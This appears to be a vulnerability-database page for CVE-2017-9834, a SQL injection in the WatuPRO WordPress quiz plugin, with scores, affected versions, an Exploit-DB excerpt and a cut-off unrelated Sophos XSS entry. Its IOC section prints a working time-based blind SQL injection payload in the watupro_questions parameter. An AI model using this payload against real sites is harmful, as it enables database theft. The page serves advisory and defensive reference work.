CVE-2017-9834
Published: 2017-09-07
Priority: P2 64 · Severity: critical, CVSS 3.0 base score 9.8
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 4.07% (89.4th percentile)
SQL injection vulnerability in the WatuPRO plugin before 5.5.3.7 for WordPress allows remote attackers to execute arbitrary SQL commands via the watupro_questions parameter in a watupro_submit action to wp-admin/admin-ajax.php.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| calendarscripts | watupro | <= 5.5.1 | — |
Detection & IOCs (extracted from sources)
- command: action=watupro_submit&quiz_id=1&question_id%5B%5D=1&watupro_questions=1:1,2)%20AND%204761%3dIF((41%3d41),SLEEP(5),4761)%20AND%20(4547%3d4547&post_id=5&answer-1%5B%5D=1&question_1_hints=&taker_email=hacker%40admin.com&h_app_id=0.24749700+1497748201&start_time=2017-06-18+01%3A10%3A01&in_ajax=1
- The vulnerability affects WatuPRO plugin versions prior to 5.5.3.7; the vendor's first patch was incomplete and did not properly fix the issue.
CVSS provenance
- NVD, CVSS v3.0: 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD, CVSS v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
No detection rules found.
Exploit-DB
WordPress Plugin WatuPRO 5.5.1 - SQL Injection
exploitdb · 2017-07-03 · CVSS 9.8
---
#####################################
Exploit Title: SQL Injection In WatuPRO (WordPress Plugin to Create Exams, Tests and Quizzes)
Exploit Author: Manich Koomsusi
Date: 03-07-2017
Software: WatuPRO
Version: 5.5.1
Website: http://calendarscripts.info/watupro/
Tested on: WordPress 4.7.5
Software Link: https://1drv.ms/u/s!AhfkvGaDTn1bmgHSj9u_jQX8iME0
CVE: CVE-2017-9834
#####################################
Description
SQL injection in the WatuPRO WordPress plugin (for creating exams, tests and quizzes) allows an attacker to dump the database contents.
Vulnerability
This plugin sends quizzes to the server with the “watupro_questions” parameter, which is not sanitized before being used in a SQL statement.
Proof of concept
Take exams or quizzes and submit to the server in P
Exploit-DB
Sophos Cyberoam - Cross-site scripting
exploitdb · 2017-05-25 · CVSS 6.1
CVE-2016-9834 [MEDIUM] Sophos Cyberoam - Cross-site scripting
---
# Exploit Title: Sophos Cyberoam – Cross-site scripting (XSS) vulnerability
# Date: 25/05/2017
# Exploit Author: Bhadresh Patel
# Version:
Credits:
Bhadresh Patel
No writeups or analysis indexed.